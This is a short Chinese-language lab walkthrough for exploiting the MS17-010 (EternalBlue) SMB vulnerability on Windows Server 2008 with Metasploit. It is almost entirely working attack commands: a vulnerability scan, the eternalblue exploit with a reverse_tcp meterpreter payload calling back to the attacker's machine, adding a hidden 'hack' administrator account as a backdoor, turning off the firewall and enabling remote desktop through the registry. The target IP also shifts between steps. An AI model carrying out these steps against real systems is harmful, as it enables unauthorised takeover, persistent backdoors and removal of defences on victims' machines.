影响版本:Windows NT,Windows 2000、Windows XP、Windows 2003、Windows
Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server
2012 SP0。
环境搭建:
- 攻击机:kali IP:192.168.120.158
- 靶机:windows server 2008 IP:192.168.120.120
- 启动数据库:msfdb start 或者 service postgresql start
具体过程:
1.在kali终端中打开msfconsole,查找ms17_010漏洞模块
search ms17_010
2.先用auxiliary/scanner/smb/smb_ms17_010模块扫描目标主机是否存在该漏洞
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.120.160
3.可以看到扫描结果是目标主机可能存在ms17_010漏洞,开始攻击
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.120.160
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.120.158
4.攻击成功
5.用shell命令拿到shell控制台权限,进行后门植入
net user hack 123 /add
net localgroup administrators hack /add
net user
net localgroup administrators
6.关闭目标防火墙
netsh advfirewall set allprofiles state off
7.打开对方的3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
8.连接远程桌面